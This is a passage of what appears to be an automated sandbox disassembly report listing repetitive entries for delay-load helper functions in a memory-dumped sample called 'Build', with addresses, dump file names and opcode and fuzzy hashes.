Function 00940A23 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009409FC

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bb4eb0b2a8e08eff93b8e582059aaa5f5cd8df14f0a971b2de5b46d36d638e40
Instruction ID: 4b6a77db8f2391f1734f2480ba1b4a13fc13bf62429f8b07cf799b8b97e13767
Opcode Fuzzy Hash: bb4eb0b2a8e08eff93b8e582059aaa5f5cd8df14f0a971b2de5b46d36d638e40
Instruction Fuzzy Hash: 11B012C139D200EC3104F189AC12D37015CC0C0B25730C93AF908C2181D4745C0C0332

Function 00940A70 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00940A5D

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 27b3bbb8eb6e469d2236e3d3d775713ec07afc9ec2a9bb2634a9944b6318141f
Instruction ID: 6bd428db59e388bbc462454ef173a035508222dc7ab7c79aacf1f8eb002dba73
Opcode Fuzzy Hash: 27b3bbb8eb6e469d2236e3d3d775713ec07afc9ec2a9bb2634a9944b6318141f
Instruction Fuzzy Hash: 31B012C17AC300EC3208B1D9DD2AE37018CD0C0B25330883BF908C11C0D4655C0F0331

Function 009406C4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0d19c7869272588b9797b330f8f66aed59618ea1fe2c0e8d758628fe3a45c843
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: 0d19c7869272588b9797b330f8f66aed59618ea1fe2c0e8d758628fe3a45c843
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 00940782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aa1aa236a6a424be86b9028e0723cca348ba629ce09f8f9441b45baa4239f280
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: aa1aa236a6a424be86b9028e0723cca348ba629ce09f8f9441b45baa4239f280
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 0094070A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 60d8cba07e444a1a1b9c88170c26a998dc2457bce96d8e36a0c154e99ac3172d
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: 60d8cba07e444a1a1b9c88170c26a998dc2457bce96d8e36a0c154e99ac3172d
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 0094073C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ffd5b9f293e65f638b110c0e5bd8bb91a1ef9573bbeb6224473061518d6bc37d
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: ffd5b9f293e65f638b110c0e5bd8bb91a1ef9573bbeb6224473061518d6bc37d
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 00940728 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e27cc26f5072eb97ddf6239be4ca725820369621740110b7ba38fbe781152a7e
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: e27cc26f5072eb97ddf6239be4ca725820369621740110b7ba38fbe781152a7e
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 00940750 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9a440aac0dbd4ad609b68d85259f9a0333463514c4d4a3974a3808f6f3a58f54
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: 9a440aac0dbd4ad609b68d85259f9a0333463514c4d4a3974a3808f6f3a58f54
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 0094075A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 092feb9a79fc9973bea137dad452ad2e598d3f0729e3e0e7f19d58695d139749
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: 092feb9a79fc9973bea137dad452ad2e598d3f0729e3e0e7f19d58695d139749
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 00940746 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7a72ed6abdb87342895d59cd4f9ae53fa81b991c4dcba71ad81b5d6dce826023
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: 7a72ed6abdb87342895d59cd4f9ae53fa81b991c4dcba71ad81b5d6dce826023
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 00940778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ed2669d1d240e0221e58827bdf61d18b122ff60169646509d8e647f6d03a7858
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: ed2669d1d240e0221e58827bdf61d18b122ff60169646509d8e647f6d03a7858
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 0094076E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0094068E

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d46fa787fbf82d3472f1bbd39ea2a673a33ad39a784b44d5a96cc813fbfed326
Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
Opcode Fuzzy Hash: d46fa787fbf82d3472f1bbd39ea2a673a33ad39a784b44d5a96cc813fbfed326
Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131

Function 0094089A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009408A7

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e45bc06376e128249a96211cfc54d46a99e8abb181d47f715a925734fb777541
Instruction ID: 3761872d18dce81406adeb2fe89629c600282cd73b0a41141a110fdf639592bb
Opcode Fuzzy Hash: e45bc06376e128249a96211cfc54d46a99e8abb181d47f715a925734fb777541
Instruction Fuzzy Hash: 17A002966552117C310971555D16D3E121CD4C0B25330896DF609D5186746518495171

Function 009408B5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009408A7

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f93e5e16c3e38753e55795e7286fda4006f34845595cb36c881317c3e18cdeaa
Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
Opcode Fuzzy Hash: f93e5e16c3e38753e55795e7286fda4006f34845595cb36c881317c3e18cdeaa
Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171

Function 009408BF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009408A7

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d4e5989958f971c78133224c3cb9b8bc583ebbfd78e1a22d76aa3c8f9c5b242b
Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
Opcode Fuzzy Hash: d4e5989958f971c78133224c3cb9b8bc583ebbfd78e1a22d76aa3c8f9c5b242b
Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171

Function 009408DD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009408A7

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 54743ec78eb6fb0cf99217b87d8b0ad20b95361dbc3a44256c807bd66577549a
Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
Opcode Fuzzy Hash: 54743ec78eb6fb0cf99217b87d8b0ad20b95361dbc3a44256c807bd66577549a
Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171

Function 009408F1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009408A7

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

